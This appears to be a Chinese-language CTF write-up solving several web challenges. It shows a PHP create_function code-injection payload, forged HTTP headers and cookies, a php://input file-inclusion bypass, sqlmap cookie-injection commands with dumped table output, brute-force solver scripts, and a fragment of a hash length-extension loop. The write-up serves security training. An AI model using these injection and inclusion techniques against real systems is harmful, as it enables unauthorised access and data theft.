create_function(args, code) // The function arguments. The function code. $j6() => function(args){ code }
此题只需将 }phpinfo();/* 进行 base64 编码,再传进去就 OK 了
抓包和改包
满足以下全部条件就能获得 flag
将 HTTP 请求方式修改为 POST
添加 HTTP 请求头“X-Give-Me-Flag”,值为 1
将包含浏览器标识的 HTTP 请求头的值修改为“Flag Browser 1.0”
将 Cookie 中“auth”的值修改为 117.29.42.247
POST 键名为“action”,值为“readflag”的数据
这题比较简单,直接用 Burp 改一下就 OK 了
POST / HTTP/1.1
Host: http01.web.raccoon.ml:8080
User-Agent: Flag Browser 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: auth=117.29.42.247
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
X-Give-Me-Flag: 1
Content-Length: 15
Content-Type: application/x-www-form-urlencoded
action=readflag
Javascript Tricks
nc 45.32.250.222 8082
var net = require('net');
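// Placeholder flag; the deployed service presumably substitutes the real value.
// Declared explicitly instead of being created as an implicit global, so the
// file also runs under strict mode.
const flag = 'fake_flag';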
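// Decide whether one client message wins the flag.
//
// The message is split on spaces into exactly five numbers. A copy is sorted
// with Array#sort WITHOUT a comparator, i.e. lexicographically
// (10,5,40,25,1000,1 -> 1,10,1000,25,40,5). Neighbouring sorted values must be
// distinct and no later value may exceed 127; the four neighbour sums, read as
// big-endian bytes, must equal 0x23332333 (590553907).
// The negativity check reads the UNSORTED values nums[0..3], exactly as the
// original did — NOTE(review): this looks like it was meant to be sorted[i];
// kept as written so the service behaves identically.
function isWinningInput(data) {
  const nums = data.toString().split(' ').map(Number);
  // The original only cleared `ok` here; nothing later could set it back,
  // so returning early is equivalent.
  if (nums.length !== 5) return false;
  const sorted = nums.slice(0);
  sorted.sort(); // deliberately no comparator — the lexicographic order is part of the puzzle
  for (let i = 0; i < 4; i++) {
    if (sorted[i + 1] === sorted[i] || nums[i] < 0 || sorted[i + 1] > 127) return false;
  }
  let val = 0;
  for (let i = 0; i < 4; i++) {
    val = val * 0x100 + (sorted[i] + sorted[i + 1]); // 0x100 = 256
  }
  return val === 0x23332333;
}

// One handler per connection; every 'data' chunk is judged on its own and
// answered with the flag or 'nope'. All working state is local to the call —
// the original kept it in implicit globals (ok, arr, arr1, arr2, val) that
// were shared between concurrently connected clients.
const server = net.createServer((socket) => {
  socket.on('data', (data) => {
    socket.write(isWinningInput(data) ? flag + '\n' : 'nope\n');
  });
});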
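// Bind address and port. '0.0.0.0' listens on every IPv4 interface, so the
// service is reachable from any network the host is attached to.
// Declared explicitly; the original created two implicit globals.
const HOST = '0.0.0.0';
const PORT = 8082;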
// Start accepting connections; the options form is equivalent to listen(PORT, HOST).
server.listen({ port: PORT, host: HOST });
初步思路:把 data 暴力跑出来,再 nc 提交一下
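def check(a, b, c, d):
    """Return True when the four values, packed big-endian one byte each,
    equal 590553907 (0x23332333); False otherwise.

    Args:
        a, b, c, d: candidate values for arr2[0..3].
    """
    val = 0
    for byte in (a, b, c, d):
        val = val * 256 + byte  # one 0x100 position per value
    # 590553907 == 0x23332333; the hex literal could be compared directly.
    return val == 590553907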
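# Brute-force the four values whose big-endian packing satisfies check().
# itertools.product walks the same 0..N-1 grid, in the same lexicographic
# order, as the original four nested loops.
import itertools

N = 60
for i, j, k, l in itertools.product(range(N), repeat=4):
    if check(i, j, k, l):
        print(i, j, k, l)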
# arr2 = [35 51 35 51]
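# Recover the five original numbers from the four adjacent sums.
# Once the first value is chosen, each sum fixes the next value, so one loop
# over the first value yields exactly the tuples the original five nested
# loops printed, in the same order.
# NOTE(review): the comment above gives arr2 as [35 51 35 51], but the second
# adjacent sum used here is 52 — kept as written; confirm which is intended.
N = 51
SUMS = (35, 52, 35, 51)
solutions = []
for i in range(N):
    tup = [i]
    for s in SUMS:
        tup.append(s - tup[-1])
    if all(0 <= v < N for v in tup):
        solutions.append(tuple(tup))
        print(*tup)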
// NOTE(review): $user and $file are set outside this snippet (the writeup
// supplies both as GET parameters). $user goes to file_get_contents() unchecked,
// so any stream wrapper PHP accepts is reachable (the page uses php://input),
// and $file reaches include() with no allowlist — a file-inclusion sink.
// The second argument 'r' is truthy, so use_include_path is enabled.
$isAdmin = isset($user) && (file_get_contents($user, 'r') === "the user is admin");
if ($isAdmin) {
    echo "hello admin!<br>";
    include($file); // class.php
} else {
    echo "you are not admin ! ";
}
这里涉及到一个 PHP 伪协议 php://input,它可以读取未经处理的原始 POST 数据。详细讲解可参考大佬的讲解。
http://120.78.187.100:8081/?user=php://input # 再 post 一个 "the user is admin" # 此时可以发现界面变成了 "hello admin!" http://120.78.187.100:8081/?user=php://input&file=class.php
# 1.cookie 注入,猜解表 sqlmap -u http://120.78.187.100:8082/content.php --cookie "message_id=1412" --table --level 2 #do you want to URL encode cookie values (implementation specific)? [Y/n] Y [10:42:28] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 9.0 (stretch) web application technology: PHP 5.6.38, Apache 2.4.25 back-end DBMS: MySQL >= 5.0.12 Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y #do you want to use common table existence check? [Y/n/q] Y 10 # 表已经跑出来了 Database: 2018_hdb_waf [3 tables] +---------------------------------------+ | user | | content | | flag | +---------------------------------------+
# 2.选择表猜解字段(flag) sqlmap -u http://120.78.187.100:8082/content.php --cookie "message_id=1412" --column -T flag --level 2 Table: flag [1 column] +--------+--------------+ | Column | Type | +--------+--------------+ | flag | varchar(255) | +--------+--------------+
for i in range(500): signature = '579e444c268e0d907802313318cdfcb2' original = 'order_id=160&buyer_id=39&good_id=25&buyer_point=500&good_price=10&order_create_time=1542226400.115264' add_data = '&a=233' key_length = len(original) + 700 + i